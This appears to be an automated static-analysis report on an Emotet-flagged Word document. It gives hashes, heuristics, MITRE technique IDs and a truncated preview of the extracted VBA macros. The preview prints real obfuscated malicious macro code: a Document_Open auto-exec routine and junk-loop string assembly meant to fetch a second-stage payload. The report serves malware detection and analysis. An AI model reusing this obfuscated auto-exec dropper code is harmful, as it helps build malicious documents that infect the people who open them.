Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 25433841ce92c587…

MALICIOUS

Office (OLE)

242.8 KB Created: 2020-01-15 12:05:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: 5d6e6b38d9e42e45c17ae275c037d727 SHA-1: 170e8c3b8c18be54d13de368021b70843bc5f7ee SHA-256: 25433841ce92c5876f9df1ceb1cd97827a28cb328b996b7a7051006ebe9a6f4d
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Malware.Emotet-7540219-0', strongly indicating the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes a 'GetObject' call, a common technique for executing malicious code. The VBA code appears obfuscated but the presence of these elements suggests the macro's purpose is to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Malware.Emotet-7540219-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-7540219-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11139 bytes
SHA-256: e27417742d7119688d67fc189fe3abeeca8bc8bb5082e13849168b82b627a447
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Rncwejxkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Iiyvvjoo
End Sub

Attribute VB_Name = "Whaeodtqkqi"
Attribute VB_Base = "0{52D0F05A-089C-4C08-9B1B-AB764DB4D7B5}{36B4AEC5-77EA-4BAB-AC54-D80C3EA04A94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Aplhseob"
Function Yenwuidyxwz()
   Do While Jmgtmxgu = 9875
      Do While Okladkfofrymd = 34
            Fvatlefspdlgu = Cos(8 + CStr(750))
      Loop
            Do While Nfotlpltbvw = 123
            Kewjjwhbf = Vjswwrelcoet
            Khuczxoeyi = 3253
      Loop
            Do While Cwyfohevy = 667
            Owjrlxrfkyzzo = CDbl(324)
            Gceqkjkqphnwa = Int(496)
      Loop
            Do While Clikffpgdhh = 2342
            Hcxjsobb = CInt(Soegujyar)
      Loop
            Do While Woqdhtrwbidhj = 3247
            Jdelvnkcpwa = Sgn(713)
            Xegpsekngfku = CByte(Qzoguxhzv + Oimmbhguw)
      Loop
Loop
Bhmfieewqmax = ChrW(wdKeyP)
   Do While Uaufrffcie = 9875
      Do While Hyhfzjzzj = 34
            Ztebuipda = Cos(8 + CStr(750))
      Loop
            Do While Ijpugstoh = 123
            Sxbpmdwclzvvu = Elutaeeapx
            Cggvsldah = 3253
      Loop
            Do While Vlhyqgmou = 667
            Nitntrnwlswz = CDbl(324)
            Fedjqleegyht = Int(496)
      Loop
            Do While Ucjvvitybes = 2342
            Lomzmndlcj = CInt(Xpjbvgzk)
      Loop
            Do While Iibdlchc = 3247
            Eytqtzufddr = Sgn(713)
            Rysjwgysc = CByte(Fdxjcadzkn + Wtivlugwkqeke)
      Loop
Loop
Yzofkzbu = Bhmfieewqmax + Whaeodtqkqi.Ekqdonwu + Whaeodtqkqi.Wnbyoebd
   Do While Qnfrughmtanf = 9875
      Do While Wnrtcnbetzjp = 34
            Kzrnucvavp = Cos(8 + CStr(750))
      Loop
            Do While Oevffomw = 123
            Ctgutmtgied = Tjzkswws
            Zzxinuudhjvx = 3253
      Loop
            Do While Aiihpgvar = 667
            Wfetaewz = CDbl(324)
            Vvdflnbwn = Int(496)
      Loop
            Do While Lskjnodvyzivg = 2342
            Qkgezxyafnf = CInt(Stddwfln)
      Loop
            Do While Mptebhmzxo = 3247
            Rpjgynrewinzc = Sgn(713)
            Ezagbvauogtw = CByte(Nimgvcouphxv + Dctcwliawi)
      Loop
Loop
Ctnwawndbnwwg = Split(Yzofkzbu + LTrim(LTrim(Whaeodtqkqi.Zazqvyncyowi. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Lmwfcmwjdvx = 9875
      Do While Rborgbgodrg = 34
            Nvlzgssowbrl = Cos(8 + CStr(750))
      Loop
            Do While Aftmqgvtudj = 123
            Daiuqzjz = Doeqcuzwfsmgi
            Pzxtbipfs = 3253
      Loop
            Do While Ogaleqyhpym = 667
            Yugeiowrypbz = CDbl(324)
            Apojmbogs = Int(496)
      Loop
            Do While Owibtgcjfvgc = 2342
            Etwprzltkyrbp = CInt(Erbkkuroqfi)
      Loop
            Do While Fjtncmihrrb = 3247
            Uljkrrcvb = Sgn(713)
            Rbbmfgkjb = CByte(Aedzcrgmazn + Fegnqvuegovbk)
      Loop
Loop
Yenwuidyxwz = Zlcfvwfxnhb + Join(Ctnwawndbnwwg, "") + Zlcfvwfxnhb
   Do While Jhbqjhfftekb = 9875
      Do While Vvdulhuz = 34
            Kiirqgyi = Cos(8 + CStr(750))
      Loop
            Do While Ogjwzpfdphryb = 123
            Zpwvibkf = Bznonfcsb
            Mgvvbqjvjlg = 3253
      Loop
            Do While Rqcmaxebirx = 667
            Obbpgaymmjbz = CDbl(324)
            Ajrtuewxxd = Int(496)
      Loop
            Do While Dlmeoxfjciuu = 2342
            Weehanumd = CInt(Yclwqexzown)
      Loop
            Do While Uduwispxoo = 3247
            Tpcbxqhunqvt = Sgn(713)
            Dwuqkievnx = CByte(Elcskodexpvyr + Fvdiajwot)
      Loop
Loop
End Function
Fun
... (truncated)